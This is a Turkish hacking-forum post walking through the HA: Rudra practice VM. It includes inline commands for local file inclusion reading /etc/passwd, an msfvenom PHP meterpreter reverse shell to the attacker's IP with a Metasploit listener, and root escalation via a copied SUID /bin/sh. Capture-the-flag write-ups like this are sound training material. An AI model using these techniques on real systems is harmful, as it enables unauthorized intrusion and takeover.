İPUCU

Capture The Flag Vulnerable VM Walkthrough & Capture The Flag Writeup Yazabileceğiniz Bölüm

Seçenekler

HA: Rudra Zafiyetli Makine Çözümü // Qwx

Qwx
Qwx - ait Kullanıcı Resmi (Avatar)
Green Team (Deneyimli)
Üyelik tarihi:
04/2012
Nereden:
İzmir
Mesajlar:
2.727
Konular:
113
Teşekkür (Etti):
93
Teşekkür (Aldı):
599
Ticaret:
(0) %
bir Hafta önce
#1
HA: Rudra Zafiyetli Makine Çözümü // Qwx
HA: Rudra Zafiyetli Makinesi Çözümü

Merhaba, değerli TürkHackTeam üyeleri bu konumuzda HA: Rudra adlı zafiyetli makinenin çözümünü yapacağız. Bir önceki zafiyetli makine çözümüm olan Misdirection: 1 konusuna ilgili linkten gidebilirsiniz; TIKLA

HA: Rudra

İsim: HA: Rudra
Çıkış Tarihi: 22 Ekim 2019
Yazar: Hacking Articles
Seri: HA
Dosya boyutu: 685 MB (zip)
İşletim sistemi: Ubuntu


İlk önce indirmiş olduğumuz zafiyetli makinenin zip dosyasından çıkartıkan sonra açılımını gerçekleştiriyoruz. Makinemizin açılış görüntüsü şu şekildedir.



Makinemizi açtıktan sonra terminal ekranımıza netdiscover komutunu yazarak makinenin IP Adresini öğreniyoruz.



IP Adresini öğrendikten sonra Nmap aracı ile portların taranmasını sağlayıp açık olanları görüntüleyeceğiz. Terminal için komutumuz nmap -sV <ipadress>



80 numaralı portumuz açık olduğu için ilgili web sitesini ziyaret ediyoruz. Birçok görselin bulunduğu bir web sitesi ile karşılaşıyoruz.



Ardından robots.txt'nin varlığını kontrol ettiğimizde nandi.php yazısını görmekteyiz. Bizlere verilen bu uzantıyı ziyaret edelim.



nandi.php'yi ziyaret ettiğimizde boş bir sayfa ile karşılaşıyoruz. .php uzantısına sahip olduğu için sayfada kod yürütme güvenlik açığının olup olmadığını kontrol ettiğimizde file parametresinin çalışıyor olduğunu görebiliyoruz. Bunun için ise ?file=/etc/passwd komutunu ekleyip çalıştırdığımız zaman bizlere çıktısını vermektedir.



Ardından showmount -e <ipadress> komutu ile NFS'ye bağlı bulunan dosya sistemlerini görüntülüyoruz ve bizlerin oluşturduğu /tmp/rudra dizinine ilgili dosyaları çıkartıyoruz. Dosya içeriğine baktığımızda mahadev.txt adlı bir yazı dosyası çıkmaktadır burada Rudra hakkında kısa bir bilgi içermektedir.



Şimdi ise msfvenom ile bir shell oluşturacağız. Oluşturma işlemine başlamadan önce IP Adresinizi öğrenmek için ifconfig komutunu kullanabilirisiniz. msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.1.4 LPORT=1234 -f raw > shell.php komutu ile shell oluşturma işlemini tamamlıyoruz.



Sıra bu oluşturduğumuz shell'i çalıştırdığımız zaman dinleme işlemini gerçekleştireceğimiz Métasploit aracımızı açmaya geldi. Terminalimize msfconsole komutunu giriyoruz. Métasploit aracımız açıldığı zaman use exploit/multi/handler ardından set payload php/meterpreter_reverse_tcp komutlarını girip LHOST ve LPORT girdilerini verdiğimiz zaman exploit diyerek çalıştırıyoruz.



Tekrardan tarayıcımızı açıyoruz ve bu sefer kod yürütme kısmına /home/shivay/shell.php girdisini veriyoruz. Bizim oluşturduğumuz shell'i çalıştırdığımız anda Métasploit aracımızdan bir session yakalamaktadır işlem başarılı bir şekilde sonuçlanmıştır.



Giriş yaptığımızda www-data kullanıcı olduğumuzu görmekteyiz. Root kullanıcısı olmak için uzun bir uğraştan sonra kendi makinemizden /bin/sh dosyasını zafiyetli makinemizin /home/shivay/ bölümüne kopyalıyoruz ve SUID bitini etkinleştiriyoruz.



Ardından zafiyetli makinemize geçip ./sh -p komutu ile çalıştırıyoruz ve root kullanıcısına yükseliyoruz. Şimdi yapmamız gerekenler sadece /root dizinine girip flag'imizi okumak olacaktır.



cat final.txt ile de flagımızı okuyup zafiyetli makine çözümüzü tamamlıyoruz.


---------------------
A hacker does for love what others would not do for money.
Konu Qwx tarafından (bir Hafta önce Saat 12:25 ) değiştirilmiştir.
Rumexus, "P4RS, Xowly, hackedbyranger Teşekkür etti.

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı